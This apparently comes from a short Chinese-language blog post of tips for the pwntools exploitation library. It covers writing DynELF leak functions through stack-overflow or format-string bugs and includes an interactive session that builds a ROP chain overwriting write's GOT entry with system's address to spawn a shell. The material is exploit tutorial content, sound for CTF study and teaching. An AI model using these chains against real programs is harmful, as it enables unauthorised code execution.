pwntools几个技巧

pwntools.pdf官网说明文档太烂，demo几乎没啥代表性，使用起来特别多的bug。

1. DynELF(self, leak, pointer=None, elf=None, libcdb=True)

官网例子是leak function p.read(addr,4)，见鬼，如果这样写，妈的猜测时间可能几天都没效果。

leak函数目的在于read addr relative memory content，最好是使用代码漏洞来lead addr relative memory content，如stack overflow/format string bug来漏洞addr 相关内存内容。

通常在栈上构造write(1,addr,len)调用，返回addr地址对应的内存content

２.DynELF return 数据应该是Iterator型，如return 地址类型时，不能用u32/u64做unpack，需要使用原返回数据以lead one byte内容。

3.通常场景，如通过read函数串改其它函数got内容，再调用被串改函数时，串改和调用得在一个rop里面send，sleep(x)，再send要串改的内容

In [223]: rop = ROP(elf)

In [224]: rop.raw('a'*140)

In [225]: rop.read(constants.STDIN_FILENO,elf.got['write'],4)

In [226]: rop.call(elf.plt['write'],[binsh_addr])

In [227]: p.send(str(rop)) ######rop call chain()

In [228]: sleep(1)

In [229]: p.send(p32(system_addr)) #####单独向process stdin send内容。

read(constants.STDIN_FILENO)会使调用block，直到stdin有内容读取，只有读取内容后才continue后继call